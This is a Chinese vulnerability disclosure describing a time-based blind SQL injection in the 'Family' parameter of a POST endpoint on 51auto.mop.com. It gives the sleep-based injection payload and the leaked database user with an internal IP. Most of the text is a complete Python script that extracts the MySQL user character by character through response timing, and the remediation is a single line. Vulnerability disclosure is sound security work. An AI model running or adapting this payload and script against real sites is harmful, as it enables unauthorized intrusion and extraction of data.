猫扑mop分站MySQL盲注

注入点:
 

POST https://51auto.mop.com/hclist_/ Family=aaa'+(select(0)from(select(sleep(10)))v)+'bbb&file1=1&happyUserId=-


参数Family可注入。

MySQL user:

appro2@172.31.2.7
 

mop_sqli_1.png



脚本附上:
 

#encoding=utf-8 import httplib import time import string import sys import random import hashlib import urllib headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36', } payloads = list(string.ascii_lowercase) for i in range(0,10): payloads.append(str(i)) payloads += ['@','_', '.'] print '[%s] Start to retrive MySQL User' % time.strftime('%H:%M:%S', time.localtime()) user = '' for i in range(1, 25): found=False while found==False: for payload in payloads: timeout_count = 0 for j in range(1,3): # 2 times to confirm try: params = { 'Family': "aaa'+(select(0)from(select(sleep(ascii(mid(user()from(%s)for(1)))=%s)))v)+'bbb" % (i, ord(payload)), 'file1': 1, 'happyUserId': '-' } params['Family'] = params['Family'] * 5 body = urllib.urlencode(params) conn = httplib.HTTPConnection('51auto.mop.com', timeout=5) conn.request(method='POST', url='/hclist_/', body=body, headers=headers) conn.getresponse().read() conn.close() print '.', break except Exception, e: timeout_count += 1 time.sleep(0.01) if timeout_count == 2: user += payload print '\n[In progress] now user is %s' % user found = True break print '\nFinally, MySQL user is', user 解决方案:

参数过滤